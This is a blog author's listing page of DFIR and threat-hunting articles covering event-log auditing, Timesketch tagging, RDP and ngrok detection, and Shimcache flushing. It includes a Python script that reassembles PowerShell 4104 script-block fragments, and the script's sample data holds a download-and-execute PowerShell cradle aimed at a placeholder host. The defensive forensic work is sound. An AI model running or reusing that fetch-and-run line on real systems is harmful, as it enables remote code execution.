
BlueteamOps

16 Followers

Nov 24, 2022

Secedit and I know it!

First, let’s talk a bit about auditpol.exe, previous occasions of it being misused, and how security policies get applied to Windows hosts. Windows Event logs play a crucial role in threat detection and response operations. Microsoft’s reporting of the Solarwinds incident provided an example of a novel technique where an…

Dfir

6 min read

Sep 26, 2021

Supercharging Bulk DFIR triage with Node-RED, Google’s Log2timeline & Google’s Timesketch

During the COVID-19 lockdown period, I spent time creating a rule set to get the most out of Google’s Timesketch tagging feature. The tagging rules were mapped to MITRE ATT&CK where applicable. Timesketch has the ability to automatically run analyzers (i.e. Tagger, Sigma rules, etc.) after a plaso file gets indexed.

Dfir

3 min read

Jan 31, 2021

RDP Goodies

Remote Desktop Protocol (T1021.001) continues to be one of the most favoured lateral movement techniques used by adversaries. This writeup attempts to provide a consolidated view of the key indicators of RDP usage and of the additional host configuration changes that can accompany it. Firewall Use: Identifies Windows firewall rule activity…

Dfir

4 min read

Aug 19, 2020

Ngrok Tunnels

FireEye’s blog post about the MAZE group identifies the use of RDP over the Ngrok service as an alternative C2 channel. This article describes potential hunts that can be used to detect ngrok activity. Please note that this article is limited to observations related to the Windows OS. What is Ngrok? Ngrok (a service much loved…

2 min read

Aug 19, 2020

Extracting PowerShell Scriptblock data Easily via block-parser

Microsoft-Windows-PowerShell%4Operational.evtx can be used to uncover malicious script usage during DFIR investigations. The ScriptBlockText field of EID 4104 (Execute a Remote Command) often contains code that helps you piece together threat actor actions. The full script block of a malicious payload is often distributed over multiple events, each carrying a MessageNumber out of a MessageTotal for the same ScriptBlockId. I have come across incidents where the malicious payload was reconstructed using Scriptblock data. However, this becomes very cumbersome to do using Event Viewer.

Dfir

1 min read
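As an added example of the reassembly the teaser above describes (this is not the author's block-parser code, and the event records are constructed inline rather than read from a real .evtx), the script below groups 4104 fragments by ScriptBlockId, orders them by MessageNumber and joins them, flagging any block whose fragments were not all recovered. The field names are the ones the real 4104 event carries; the ScriptBlockId values and script text are placeholders. Reading a real export would need wevtutil or python-evtx, which is assumed rather than shown.

```python
"""Reassemble PowerShell script blocks from EID 4104 fragments.

Added example for this listing page; it is not the author's block-parser
code. The 4104 field names (MessageNumber, MessageTotal, ScriptBlockId,
ScriptBlockText, Path) are the ones Windows writes; the event records
below are constructed inline so the script runs offline.
"""
import xml.etree.ElementTree as ET
from collections import defaultdict
from xml.sax.saxutils import escape

# Namespace used by every Windows event exported as XML.
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}


def make_event(event_id, block_id, number, total, text, path):
    """Build one PowerShell Operational event as XML (constructed sample)."""
    return (
        f'<Event xmlns="{NS["e"]}">'
        '<System><Provider Name="Microsoft-Windows-PowerShell"/>'
        f"<EventID>{event_id}</EventID></System>"
        "<EventData>"
        f'<Data Name="MessageNumber">{number}</Data>'
        f'<Data Name="MessageTotal">{total}</Data>'
        f'<Data Name="ScriptBlockText">{escape(text)}</Data>'
        f'<Data Name="ScriptBlockId">{block_id}</Data>'
        f'<Data Name="Path">{escape(path)}</Data>'
        "</EventData></Event>"
    )


# Constructed: one block split over three 4104 events, interleaved with an
# unrelated one-fragment block, a block whose second fragment was never
# recovered, and a 4103 event that must be skipped. IDs are placeholders,
# not real ScriptBlockId GUIDs.
FULL_A = (
    "$u = 'http://example.invalid/stage2.txt'; "
    "$c = (New-Object Net.WebClient).DownloadString($u); "
    "Invoke-Expression $c"
)
A1, A2, A3 = FULL_A[:40], FULL_A[40:80], FULL_A[80:]
SAMPLE_EVENTS = [
    make_event(4104, "blk-a", 1, 3, A1, r"C:\Users\Public\up.ps1"),
    make_event(4104, "blk-b", 1, 1, "Get-Date", ""),
    make_event(4104, "blk-c", 1, 2, "Start-Process calc.exe; ", r"C:\Temp\x.ps1"),
    make_event(4104, "blk-a", 2, 3, A2, r"C:\Users\Public\up.ps1"),
    '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
    "<System><EventID>4103</EventID></System><EventData/></Event>",
    make_event(4104, "blk-a", 3, 3, A3, r"C:\Users\Public\up.ps1"),
]


def parse_4104(xml_text):
    """Return the 4104 fields as a dict, or None for any other event ID."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "4104":
        return None
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    return {
        "id": data["ScriptBlockId"],
        "number": int(data["MessageNumber"]),
        "total": int(data["MessageTotal"]),
        "text": data["ScriptBlockText"],
        "path": data.get("Path", ""),
    }


def reassemble(events):
    """Group fragments by ScriptBlockId, order by MessageNumber and join them.

    Blocks with gaps are still returned, flagged incomplete with the missing
    fragment numbers, so a partially rolled log does not silently yield a
    truncated payload that reads as if it were whole.
    """
    fragments = defaultdict(dict)
    meta = {}
    for xml_text in events:
        rec = parse_4104(xml_text)
        if rec is None:
            continue
        fragments[rec["id"]][rec["number"]] = rec["text"]
        meta[rec["id"]] = (rec["total"], rec["path"])
    blocks = {}
    for block_id, parts in fragments.items():
        total, path = meta[block_id]
        missing = [n for n in range(1, total + 1) if n not in parts]
        blocks[block_id] = {
            "text": "".join(parts[n] for n in sorted(parts)),
            "complete": not missing,
            "missing": missing,
            "path": path,
        }
    return blocks


if __name__ == "__main__":
    for bid, b in reassemble(SAMPLE_EVENTS).items():
        status = "complete" if b["complete"] else f"missing {b['missing']}"
        print(f"{bid} ({status}) from {b['path'] or '<interactive>'}:\n  {b['text']}")
```

Ordering by MessageNumber rather than by record order matters because fragments of different blocks interleave in the log, and the completeness flag is what tells you whether a reconstructed payload can be trusted before you start analysing it.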

May 27, 2020

Shimcache Flush!

A cleanup routine that threat actors can perform to flush the Shimcache and remove traces of their malicious activity. Shimcache, aka AppCompatCache, is a high-value artefact used in forensic analysis during cyber breaches. It holds records that provide evidence of execution, or at least of the existence, of PEs. Latest…

Shimcache

1 min read

Janantha Marasinghe’s Research